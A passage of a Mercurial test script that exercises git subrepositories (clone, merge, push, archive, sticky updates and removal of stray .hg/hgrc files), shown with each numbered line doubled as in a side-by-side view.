103 $ hg clone . ../ta 2> /dev/null
104 updating to branch default
104 updating to branch default
105 cloning subrepo s from $TESTTMP/gitroot
105 cloning subrepo s from $TESTTMP/gitroot
106 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
106 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
107
107
108 $ cd ../ta
108 $ cd ../ta
109 $ echo ggg >> s/g
109 $ echo ggg >> s/g
110 $ hg status --subrepos
110 $ hg status --subrepos
111 M s/g
111 M s/g
112 $ hg diff --subrepos
112 $ hg diff --subrepos
113 diff --git a/s/g b/s/g
113 diff --git a/s/g b/s/g
114 index 089258f..85341ee 100644
114 index 089258f..85341ee 100644
115 --- a/s/g
115 --- a/s/g
116 +++ b/s/g
116 +++ b/s/g
117 @@ -1,2 +1,3 @@
117 @@ -1,2 +1,3 @@
118 g
118 g
119 gg
119 gg
120 +ggg
120 +ggg
121 $ hg commit --subrepos -m ggg
121 $ hg commit --subrepos -m ggg
122 committing subrepository s
122 committing subrepository s
123 $ hg debugsub
123 $ hg debugsub
124 path s
124 path s
125 source ../gitroot
125 source ../gitroot
126 revision 79695940086840c99328513acbe35f90fcd55e57
126 revision 79695940086840c99328513acbe35f90fcd55e57
127
127
128 clone root separately, make different local change
128 clone root separately, make different local change
129
129
130 $ cd ../t
130 $ cd ../t
131 $ hg clone . ../tb 2> /dev/null
131 $ hg clone . ../tb 2> /dev/null
132 updating to branch default
132 updating to branch default
133 cloning subrepo s from $TESTTMP/gitroot
133 cloning subrepo s from $TESTTMP/gitroot
134 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
134 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
135
135
136 $ cd ../tb/s
136 $ cd ../tb/s
137 $ hg status --subrepos
137 $ hg status --subrepos
138 $ echo f > f
138 $ echo f > f
139 $ hg status --subrepos
139 $ hg status --subrepos
140 ? s/f
140 ? s/f
141 $ hg add .
141 $ hg add .
142 adding f
142 adding f
143 $ git add f
143 $ git add f
144 $ cd ..
144 $ cd ..
145
145
146 $ hg status --subrepos
146 $ hg status --subrepos
147 A s/f
147 A s/f
148 $ hg commit --subrepos -m f
148 $ hg commit --subrepos -m f
149 committing subrepository s
149 committing subrepository s
150 $ hg debugsub
150 $ hg debugsub
151 path s
151 path s
152 source ../gitroot
152 source ../gitroot
153 revision aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
153 revision aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
154
154
155 user b push changes
155 user b push changes
156
156
157 $ hg push 2>/dev/null
157 $ hg push 2>/dev/null
158 pushing to $TESTTMP/t (glob)
158 pushing to $TESTTMP/t (glob)
159 pushing branch testing of subrepository "s"
159 pushing branch testing of subrepository "s"
160 searching for changes
160 searching for changes
161 adding changesets
161 adding changesets
162 adding manifests
162 adding manifests
163 adding file changes
163 adding file changes
164 added 1 changesets with 1 changes to 1 files
164 added 1 changesets with 1 changes to 1 files
165
165
166 user a pulls, merges, commits
166 user a pulls, merges, commits
167
167
168 $ cd ../ta
168 $ cd ../ta
169 $ hg pull
169 $ hg pull
170 pulling from $TESTTMP/t (glob)
170 pulling from $TESTTMP/t (glob)
171 searching for changes
171 searching for changes
172 adding changesets
172 adding changesets
173 adding manifests
173 adding manifests
174 adding file changes
174 adding file changes
175 added 1 changesets with 1 changes to 1 files (+1 heads)
175 added 1 changesets with 1 changes to 1 files (+1 heads)
176 (run 'hg heads' to see heads, 'hg merge' to merge)
176 (run 'hg heads' to see heads, 'hg merge' to merge)
177 $ hg merge 2>/dev/null
177 $ hg merge 2>/dev/null
178 subrepository s diverged (local revision: 7969594, remote revision: aa84837)
178 subrepository s diverged (local revision: 7969594, remote revision: aa84837)
179 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
179 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
180 pulling subrepo s from $TESTTMP/gitroot
180 pulling subrepo s from $TESTTMP/gitroot
181 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
181 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
182 (branch merge, don't forget to commit)
182 (branch merge, don't forget to commit)
183 $ hg st --subrepos s
183 $ hg st --subrepos s
184 A s/f
184 A s/f
185 $ cat s/f
185 $ cat s/f
186 f
186 f
187 $ cat s/g
187 $ cat s/g
188 g
188 g
189 gg
189 gg
190 ggg
190 ggg
191 $ hg commit --subrepos -m 'merge'
191 $ hg commit --subrepos -m 'merge'
192 committing subrepository s
192 committing subrepository s
193 $ hg status --subrepos --rev 1:5
193 $ hg status --subrepos --rev 1:5
194 M .hgsubstate
194 M .hgsubstate
195 M s/g
195 M s/g
196 A s/f
196 A s/f
197 $ hg debugsub
197 $ hg debugsub
198 path s
198 path s
199 source ../gitroot
199 source ../gitroot
200 revision f47b465e1bce645dbf37232a00574aa1546ca8d3
200 revision f47b465e1bce645dbf37232a00574aa1546ca8d3
201 $ hg push 2>/dev/null
201 $ hg push 2>/dev/null
202 pushing to $TESTTMP/t (glob)
202 pushing to $TESTTMP/t (glob)
203 pushing branch testing of subrepository "s"
203 pushing branch testing of subrepository "s"
204 searching for changes
204 searching for changes
205 adding changesets
205 adding changesets
206 adding manifests
206 adding manifests
207 adding file changes
207 adding file changes
208 added 2 changesets with 2 changes to 1 files
208 added 2 changesets with 2 changes to 1 files
209
209
210 make upstream git changes
210 make upstream git changes
211
211
212 $ cd ..
212 $ cd ..
213 $ git clone -q gitroot gitclone
213 $ git clone -q gitroot gitclone
214 $ cd gitclone
214 $ cd gitclone
215 $ echo ff >> f
215 $ echo ff >> f
216 $ git commit -q -a -m ff
216 $ git commit -q -a -m ff
217 $ echo fff >> f
217 $ echo fff >> f
218 $ git commit -q -a -m fff
218 $ git commit -q -a -m fff
219 $ git push origin testing 2>/dev/null
219 $ git push origin testing 2>/dev/null
220
220
221 make and push changes to hg without updating the subrepo
221 make and push changes to hg without updating the subrepo
222
222
223 $ cd ../t
223 $ cd ../t
224 $ hg clone . ../td 2>&1 | egrep -v '^Cloning into|^done\.'
224 $ hg clone . ../td 2>&1 | egrep -v '^Cloning into|^done\.'
225 updating to branch default
225 updating to branch default
226 cloning subrepo s from $TESTTMP/gitroot
226 cloning subrepo s from $TESTTMP/gitroot
227 checking out detached HEAD in subrepository "s"
227 checking out detached HEAD in subrepository "s"
228 check out a git branch if you intend to make changes
228 check out a git branch if you intend to make changes
229 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
229 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
230 $ cd ../td
230 $ cd ../td
231 $ echo aa >> a
231 $ echo aa >> a
232 $ hg commit -m aa
232 $ hg commit -m aa
233 $ hg push
233 $ hg push
234 pushing to $TESTTMP/t (glob)
234 pushing to $TESTTMP/t (glob)
235 searching for changes
235 searching for changes
236 adding changesets
236 adding changesets
237 adding manifests
237 adding manifests
238 adding file changes
238 adding file changes
239 added 1 changesets with 1 changes to 1 files
239 added 1 changesets with 1 changes to 1 files
240
240
241 sync to upstream git, distribute changes
241 sync to upstream git, distribute changes
242
242
243 $ cd ../ta
243 $ cd ../ta
244 $ hg pull -u -q
244 $ hg pull -u -q
245 $ cd s
245 $ cd s
246 $ git pull -q >/dev/null 2>/dev/null
246 $ git pull -q >/dev/null 2>/dev/null
247 $ cd ..
247 $ cd ..
248 $ hg commit -m 'git upstream sync'
248 $ hg commit -m 'git upstream sync'
249 $ hg debugsub
249 $ hg debugsub
250 path s
250 path s
251 source ../gitroot
251 source ../gitroot
252 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
252 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
253 $ hg push -q
253 $ hg push -q
254
254
255 $ cd ../tb
255 $ cd ../tb
256 $ hg pull -q
256 $ hg pull -q
257 $ hg update 2>/dev/null
257 $ hg update 2>/dev/null
258 pulling subrepo s from $TESTTMP/gitroot
258 pulling subrepo s from $TESTTMP/gitroot
259 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
259 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
260 $ hg debugsub
260 $ hg debugsub
261 path s
261 path s
262 source ../gitroot
262 source ../gitroot
263 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
263 revision 32a343883b74769118bb1d3b4b1fbf9156f4dddc
264
264
265 create a new git branch
265 create a new git branch
266
266
267 $ cd s
267 $ cd s
268 $ git checkout -b b2
268 $ git checkout -b b2
269 Switched to a new branch 'b2'
269 Switched to a new branch 'b2'
270 $ echo a>a
270 $ echo a>a
271 $ git add a
271 $ git add a
272 $ git commit -qm 'add a'
272 $ git commit -qm 'add a'
273 $ cd ..
273 $ cd ..
274 $ hg commit -m 'add branch in s'
274 $ hg commit -m 'add branch in s'
275
275
276 pulling new git branch should not create tracking branch named 'origin/b2'
276 pulling new git branch should not create tracking branch named 'origin/b2'
277 (issue3870)
277 (issue3870)
278 $ cd ../td/s
278 $ cd ../td/s
279 $ git remote set-url origin $TESTTMP/tb/s
279 $ git remote set-url origin $TESTTMP/tb/s
280 $ git branch --no-track oldtesting
280 $ git branch --no-track oldtesting
281 $ cd ..
281 $ cd ..
282 $ hg pull -q ../tb
282 $ hg pull -q ../tb
283 $ hg up
283 $ hg up
284 From $TESTTMP/tb/s
284 From $TESTTMP/tb/s
285 * [new branch] b2 -> origin/b2
285 * [new branch] b2 -> origin/b2
286 Previous HEAD position was f47b465... merge
286 Previous HEAD position was f47b465... merge
287 Switched to a new branch 'b2'
287 Switched to a new branch 'b2'
288 pulling subrepo s from $TESTTMP/tb/s
288 pulling subrepo s from $TESTTMP/tb/s
289 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
289 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
290
290
291 update to a revision without the subrepo, keeping the local git repository
291 update to a revision without the subrepo, keeping the local git repository
292
292
293 $ cd ../t
293 $ cd ../t
294 $ hg up 0
294 $ hg up 0
295 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
295 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
296 $ ls -a s
296 $ ls -a s
297 .
297 .
298 ..
298 ..
299 .git
299 .git
300
300
301 $ hg up 2
301 $ hg up 2
302 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
302 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
303 $ ls -a s
303 $ ls -a s
304 .
304 .
305 ..
305 ..
306 .git
306 .git
307 g
307 g
308
308
309 archive subrepos
309 archive subrepos
310
310
311 $ cd ../tc
311 $ cd ../tc
312 $ hg pull -q
312 $ hg pull -q
313 $ hg archive --subrepos -r 5 ../archive 2>/dev/null
313 $ hg archive --subrepos -r 5 ../archive 2>/dev/null
314 pulling subrepo s from $TESTTMP/gitroot
314 pulling subrepo s from $TESTTMP/gitroot
315 $ cd ../archive
315 $ cd ../archive
316 $ cat s/f
316 $ cat s/f
317 f
317 f
318 $ cat s/g
318 $ cat s/g
319 g
319 g
320 gg
320 gg
321 ggg
321 ggg
322
322
323 $ hg -R ../tc archive --subrepo -r 5 -X ../tc/**f ../archive_x 2>/dev/null
323 $ hg -R ../tc archive --subrepo -r 5 -X ../tc/**f ../archive_x 2>/dev/null
324 $ find ../archive_x | sort | grep -v pax_global_header
324 $ find ../archive_x | sort | grep -v pax_global_header
325 ../archive_x
325 ../archive_x
326 ../archive_x/.hg_archival.txt
326 ../archive_x/.hg_archival.txt
327 ../archive_x/.hgsub
327 ../archive_x/.hgsub
328 ../archive_x/.hgsubstate
328 ../archive_x/.hgsubstate
329 ../archive_x/a
329 ../archive_x/a
330 ../archive_x/s
330 ../archive_x/s
331 ../archive_x/s/g
331 ../archive_x/s/g
332
332
333 $ hg -R ../tc archive -S ../archive.tgz --prefix '.' 2>/dev/null
333 $ hg -R ../tc archive -S ../archive.tgz --prefix '.' 2>/dev/null
334 $ tar -tzf ../archive.tgz | sort | grep -v pax_global_header
334 $ tar -tzf ../archive.tgz | sort | grep -v pax_global_header
335 .hg_archival.txt
335 .hg_archival.txt
336 .hgsub
336 .hgsub
337 .hgsubstate
337 .hgsubstate
338 a
338 a
339 s/g
339 s/g
340
340
341 create nested repo
341 create nested repo
342
342
343 $ cd ..
343 $ cd ..
344 $ hg init outer
344 $ hg init outer
345 $ cd outer
345 $ cd outer
346 $ echo b>b
346 $ echo b>b
347 $ hg add b
347 $ hg add b
348 $ hg commit -m b
348 $ hg commit -m b
349
349
350 $ hg clone ../t inner 2> /dev/null
350 $ hg clone ../t inner 2> /dev/null
351 updating to branch default
351 updating to branch default
352 cloning subrepo s from $TESTTMP/gitroot
352 cloning subrepo s from $TESTTMP/gitroot
353 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
353 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
354 $ echo inner = inner > .hgsub
354 $ echo inner = inner > .hgsub
355 $ hg add .hgsub
355 $ hg add .hgsub
356 $ hg commit -m 'nested sub'
356 $ hg commit -m 'nested sub'
357
357
358 nested commit
358 nested commit
359
359
360 $ echo ffff >> inner/s/f
360 $ echo ffff >> inner/s/f
361 $ hg status --subrepos
361 $ hg status --subrepos
362 M inner/s/f
362 M inner/s/f
363 $ hg commit --subrepos -m nested
363 $ hg commit --subrepos -m nested
364 committing subrepository inner
364 committing subrepository inner
365 committing subrepository inner/s (glob)
365 committing subrepository inner/s (glob)
366
366
367 nested archive
367 nested archive
368
368
369 $ hg archive --subrepos ../narchive
369 $ hg archive --subrepos ../narchive
370 $ ls ../narchive/inner/s | grep -v pax_global_header
370 $ ls ../narchive/inner/s | grep -v pax_global_header
371 f
371 f
372 g
372 g
373
373
374 relative source expansion
374 relative source expansion
375
375
376 $ cd ..
376 $ cd ..
377 $ mkdir d
377 $ mkdir d
378 $ hg clone t d/t 2> /dev/null
378 $ hg clone t d/t 2> /dev/null
379 updating to branch default
379 updating to branch default
380 cloning subrepo s from $TESTTMP/gitroot
380 cloning subrepo s from $TESTTMP/gitroot
381 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
381 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
382
382
383 Don't crash if the subrepo is missing
383 Don't crash if the subrepo is missing
384
384
385 $ hg clone t missing -q
385 $ hg clone t missing -q
386 $ cd missing
386 $ cd missing
387 $ rm -rf s
387 $ rm -rf s
388 $ hg status -S
388 $ hg status -S
389 $ hg sum | grep commit
389 $ hg sum | grep commit
390 commit: 1 subrepos
390 commit: 1 subrepos
391 $ hg push -q
391 $ hg push -q
392 abort: subrepo s is missing (in subrepository "s")
392 abort: subrepo s is missing (in subrepository "s")
393 [255]
393 [255]
394 $ hg commit --subrepos -qm missing
394 $ hg commit --subrepos -qm missing
395 abort: subrepo s is missing (in subrepository "s")
395 abort: subrepo s is missing (in subrepository "s")
396 [255]
396 [255]
397
397
398 #if symlink
398 #if symlink
399 Don't crash if subrepo is a broken symlink
399 Don't crash if subrepo is a broken symlink
400 $ ln -s broken s
400 $ ln -s broken s
401 $ hg status -S
401 $ hg status -S
402 $ hg push -q
402 $ hg push -q
403 abort: subrepo s is missing (in subrepository "s")
403 abort: subrepo s is missing (in subrepository "s")
404 [255]
404 [255]
405 $ hg commit --subrepos -qm missing
405 $ hg commit --subrepos -qm missing
406 abort: subrepo s is missing (in subrepository "s")
406 abort: subrepo s is missing (in subrepository "s")
407 [255]
407 [255]
408 $ rm s
408 $ rm s
409 #endif
409 #endif
410
410
411 $ hg update -C 2> /dev/null
411 $ hg update -C 2> /dev/null
412 cloning subrepo s from $TESTTMP/gitroot
412 cloning subrepo s from $TESTTMP/gitroot
413 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
413 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
414 $ hg sum | grep commit
414 $ hg sum | grep commit
415 commit: (clean)
415 commit: (clean)
416
416
417 Don't crash if the .hgsubstate entry is missing
417 Don't crash if the .hgsubstate entry is missing
418
418
419 $ hg update 1 -q
419 $ hg update 1 -q
420 $ hg rm .hgsubstate
420 $ hg rm .hgsubstate
421 $ hg commit .hgsubstate -m 'no substate'
421 $ hg commit .hgsubstate -m 'no substate'
422 nothing changed
422 nothing changed
423 [1]
423 [1]
424 $ hg tag -l nosubstate
424 $ hg tag -l nosubstate
425 $ hg manifest
425 $ hg manifest
426 .hgsub
426 .hgsub
427 .hgsubstate
427 .hgsubstate
428 a
428 a
429
429
430 $ hg status -S
430 $ hg status -S
431 R .hgsubstate
431 R .hgsubstate
432 $ hg sum | grep commit
432 $ hg sum | grep commit
433 commit: 1 removed, 1 subrepos (new branch head)
433 commit: 1 removed, 1 subrepos (new branch head)
434
434
435 $ hg commit -m 'restore substate'
435 $ hg commit -m 'restore substate'
436 nothing changed
436 nothing changed
437 [1]
437 [1]
438 $ hg manifest
438 $ hg manifest
439 .hgsub
439 .hgsub
440 .hgsubstate
440 .hgsubstate
441 a
441 a
442 $ hg sum | grep commit
442 $ hg sum | grep commit
443 commit: 1 removed, 1 subrepos (new branch head)
443 commit: 1 removed, 1 subrepos (new branch head)
444
444
445 $ hg update -qC nosubstate
445 $ hg update -qC nosubstate
446 $ ls s
446 $ ls s
447 g
447 g
448
448
449 issue3109: false positives in git diff-index
449 issue3109: false positives in git diff-index
450
450
451 $ hg update -q
451 $ hg update -q
452 $ touch -t 200001010000 s/g
452 $ touch -t 200001010000 s/g
453 $ hg status --subrepos
453 $ hg status --subrepos
454 $ touch -t 200001010000 s/g
454 $ touch -t 200001010000 s/g
455 $ hg sum | grep commit
455 $ hg sum | grep commit
456 commit: (clean)
456 commit: (clean)
457
457
458 Check hg update --clean
458 Check hg update --clean
459 $ cd $TESTTMP/ta
459 $ cd $TESTTMP/ta
460 $ echo > s/g
460 $ echo > s/g
461 $ cd s
461 $ cd s
462 $ echo c1 > f1
462 $ echo c1 > f1
463 $ echo c1 > f2
463 $ echo c1 > f2
464 $ git add f1
464 $ git add f1
465 $ cd ..
465 $ cd ..
466 $ hg status -S
466 $ hg status -S
467 M s/g
467 M s/g
468 A s/f1
468 A s/f1
469 ? s/f2
469 ? s/f2
470 $ ls s
470 $ ls s
471 f
471 f
472 f1
472 f1
473 f2
473 f2
474 g
474 g
475 $ hg update --clean
475 $ hg update --clean
476 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
476 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
477 $ hg status -S
477 $ hg status -S
478 ? s/f1
478 ? s/f1
479 ? s/f2
479 ? s/f2
480 $ ls s
480 $ ls s
481 f
481 f
482 f1
482 f1
483 f2
483 f2
484 g
484 g
485
485
486 Sticky subrepositories, no changes
486 Sticky subrepositories, no changes
487 $ cd $TESTTMP/ta
487 $ cd $TESTTMP/ta
488 $ hg id -n
488 $ hg id -n
489 7
489 7
490 $ cd s
490 $ cd s
491 $ git rev-parse HEAD
491 $ git rev-parse HEAD
492 32a343883b74769118bb1d3b4b1fbf9156f4dddc
492 32a343883b74769118bb1d3b4b1fbf9156f4dddc
493 $ cd ..
493 $ cd ..
494 $ hg update 1 > /dev/null 2>&1
494 $ hg update 1 > /dev/null 2>&1
495 $ hg id -n
495 $ hg id -n
496 1
496 1
497 $ cd s
497 $ cd s
498 $ git rev-parse HEAD
498 $ git rev-parse HEAD
499 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
499 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
500 $ cd ..
500 $ cd ..
501
501
502 Sticky subrepositories, file changes
502 Sticky subrepositories, file changes
503 $ touch s/f1
503 $ touch s/f1
504 $ cd s
504 $ cd s
505 $ git add f1
505 $ git add f1
506 $ cd ..
506 $ cd ..
507 $ hg id -n
507 $ hg id -n
508 1+
508 1+
509 $ cd s
509 $ cd s
510 $ git rev-parse HEAD
510 $ git rev-parse HEAD
511 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
511 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
512 $ cd ..
512 $ cd ..
513 $ hg update 4
513 $ hg update 4
514 subrepository s diverged (local revision: da5f5b1, remote revision: aa84837)
514 subrepository s diverged (local revision: da5f5b1, remote revision: aa84837)
515 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
515 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
516 subrepository sources for s differ
516 subrepository sources for s differ
517 use (l)ocal source (da5f5b1) or (r)emote source (aa84837)? l
517 use (l)ocal source (da5f5b1) or (r)emote source (aa84837)? l
518 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
518 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
519 $ hg id -n
519 $ hg id -n
520 4+
520 4+
521 $ cd s
521 $ cd s
522 $ git rev-parse HEAD
522 $ git rev-parse HEAD
523 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
523 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
524 $ cd ..
524 $ cd ..
525 $ hg update --clean tip > /dev/null 2>&1
525 $ hg update --clean tip > /dev/null 2>&1
526
526
527 Sticky subrepository, revision updates
527 Sticky subrepository, revision updates
528 $ hg id -n
528 $ hg id -n
529 7
529 7
530 $ cd s
530 $ cd s
531 $ git rev-parse HEAD
531 $ git rev-parse HEAD
532 32a343883b74769118bb1d3b4b1fbf9156f4dddc
532 32a343883b74769118bb1d3b4b1fbf9156f4dddc
533 $ cd ..
533 $ cd ..
534 $ cd s
534 $ cd s
535 $ git checkout aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
535 $ git checkout aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
536 Previous HEAD position was 32a3438... fff
536 Previous HEAD position was 32a3438... fff
537 HEAD is now at aa84837... f
537 HEAD is now at aa84837... f
538 $ cd ..
538 $ cd ..
539 $ hg update 1
539 $ hg update 1
540 subrepository s diverged (local revision: 32a3438, remote revision: da5f5b1)
540 subrepository s diverged (local revision: 32a3438, remote revision: da5f5b1)
541 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
541 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
542 subrepository sources for s differ (in checked out version)
542 subrepository sources for s differ (in checked out version)
543 use (l)ocal source (32a3438) or (r)emote source (da5f5b1)? l
543 use (l)ocal source (32a3438) or (r)emote source (da5f5b1)? l
544 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
544 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
545 $ hg id -n
545 $ hg id -n
546 1+
546 1+
547 $ cd s
547 $ cd s
548 $ git rev-parse HEAD
548 $ git rev-parse HEAD
549 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
549 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
550 $ cd ..
550 $ cd ..
551
551
552 Sticky subrepository, file changes and revision updates
552 Sticky subrepository, file changes and revision updates
553 $ touch s/f1
553 $ touch s/f1
554 $ cd s
554 $ cd s
555 $ git add f1
555 $ git add f1
556 $ git rev-parse HEAD
556 $ git rev-parse HEAD
557 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
557 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
558 $ cd ..
558 $ cd ..
559 $ hg id -n
559 $ hg id -n
560 1+
560 1+
561 $ hg update 7
561 $ hg update 7
562 subrepository s diverged (local revision: 32a3438, remote revision: 32a3438)
562 subrepository s diverged (local revision: 32a3438, remote revision: 32a3438)
563 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
563 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
564 subrepository sources for s differ
564 subrepository sources for s differ
565 use (l)ocal source (32a3438) or (r)emote source (32a3438)? l
565 use (l)ocal source (32a3438) or (r)emote source (32a3438)? l
566 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
566 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
567 $ hg id -n
567 $ hg id -n
568 7+
568 7+
569 $ cd s
569 $ cd s
570 $ git rev-parse HEAD
570 $ git rev-parse HEAD
571 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
571 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
572 $ cd ..
572 $ cd ..
573
573
574 Sticky repository, update --clean
574 Sticky repository, update --clean
575 $ hg update --clean tip 2>/dev/null
575 $ hg update --clean tip 2>/dev/null
576 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
576 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
577 $ hg id -n
577 $ hg id -n
578 7
578 7
579 $ cd s
579 $ cd s
580 $ git rev-parse HEAD
580 $ git rev-parse HEAD
581 32a343883b74769118bb1d3b4b1fbf9156f4dddc
581 32a343883b74769118bb1d3b4b1fbf9156f4dddc
582 $ cd ..
582 $ cd ..
583
583
584 Test subrepo already at intended revision:
584 Test subrepo already at intended revision:
585 $ cd s
585 $ cd s
586 $ git checkout 32a343883b74769118bb1d3b4b1fbf9156f4dddc
586 $ git checkout 32a343883b74769118bb1d3b4b1fbf9156f4dddc
587 HEAD is now at 32a3438... fff
587 HEAD is now at 32a3438... fff
588 $ cd ..
588 $ cd ..
589 $ hg update 1
589 $ hg update 1
590 Previous HEAD position was 32a3438... fff
590 Previous HEAD position was 32a3438... fff
591 HEAD is now at da5f5b1... g
591 HEAD is now at da5f5b1... g
592 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
592 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
593 $ hg id -n
593 $ hg id -n
594 1
594 1
595 $ cd s
595 $ cd s
596 $ git rev-parse HEAD
596 $ git rev-parse HEAD
597 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
597 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
598 $ cd ..
598 $ cd ..
599
599
600 Test forgetting files, not implemented in git subrepo, used to
600 Test forgetting files, not implemented in git subrepo, used to
601 traceback
601 traceback
602 #if no-windows
602 #if no-windows
603 $ hg forget 'notafile*'
603 $ hg forget 'notafile*'
604 notafile*: No such file or directory
604 notafile*: No such file or directory
605 [1]
605 [1]
606 #else
606 #else
607 $ hg forget 'notafile'
607 $ hg forget 'notafile'
608 notafile: * (glob)
608 notafile: * (glob)
609 [1]
609 [1]
610 #endif
610 #endif
611
611
612 $ cd ..
612 $ cd ..
613
613
614 Test sanitizing ".hg/hgrc" in subrepo
614 Test sanitizing ".hg/hgrc" in subrepo
615
615
616 $ cd t
616 $ cd t
617 $ hg tip -q
617 $ hg tip -q
618 7:af6d2edbb0d3
618 7:af6d2edbb0d3
619 $ hg update -q -C af6d2edbb0d3
619 $ hg update -q -C af6d2edbb0d3
620 $ cd s
620 $ cd s
621 $ git checkout -q -b sanitize-test
621 $ git checkout -q -b sanitize-test
622 $ mkdir .hg
622 $ mkdir .hg
623 $ echo '.hg/hgrc in git repo' > .hg/hgrc
623 $ echo '.hg/hgrc in git repo' > .hg/hgrc
624 $ mkdir -p sub/.hg
624 $ mkdir -p sub/.hg
625 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
625 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
626 $ git add .hg sub
626 $ git add .hg sub
627 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update'
627 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update'
628 $ git push -q origin sanitize-test
628 $ git push -q origin sanitize-test
629 $ cd ..
629 $ cd ..
630 $ grep ' s$' .hgsubstate
630 $ grep ' s$' .hgsubstate
631 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
631 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
632 $ hg commit -qm 'commit with git revision including .hg/hgrc'
632 $ hg commit -qm 'commit with git revision including .hg/hgrc'
633 $ hg parents -q
633 $ hg parents -q
634 8:3473d20bddcf
634 8:3473d20bddcf
635 $ grep ' s$' .hgsubstate
635 $ grep ' s$' .hgsubstate
636 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
636 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
637 $ cd ..
637 $ cd ..
638
638
639 $ hg -R tc pull -q
639 $ hg -R tc pull -q
640 $ hg -R tc update -q -C 3473d20bddcf 2>&1 | sort
640 $ hg -R tc update -q -C 3473d20bddcf 2>&1 | sort
641 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
641 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
642 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
642 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
643 $ cd tc
643 $ cd tc
644 $ hg parents -q
644 $ hg parents -q
645 8:3473d20bddcf
645 8:3473d20bddcf
646 $ grep ' s$' .hgsubstate
646 $ grep ' s$' .hgsubstate
647 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
647 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
648 $ test -f s/.hg/hgrc
648 $ test -f s/.hg/hgrc
649 [1]
649 [1]
650 $ test -f s/sub/.hg/hgrc
650 $ test -f s/sub/.hg/hgrc
651 [1]
651 [1]
652 $ cd ..
652 $ cd ..
653
653
654 additional test for "git merge --ff" route:
654 additional test for "git merge --ff" route:
655
655
656 $ cd t
656 $ cd t
657 $ hg tip -q
657 $ hg tip -q
658 8:3473d20bddcf
658 8:3473d20bddcf
659 $ hg update -q -C af6d2edbb0d3
659 $ hg update -q -C af6d2edbb0d3
660 $ cd s
660 $ cd s
661 $ git checkout -q testing
661 $ git checkout -q testing
662 $ mkdir .hg
662 $ mkdir .hg
663 $ echo '.hg/hgrc in git repo' > .hg/hgrc
663 $ echo '.hg/hgrc in git repo' > .hg/hgrc
664 $ mkdir -p sub/.hg
664 $ mkdir -p sub/.hg
665 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
665 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
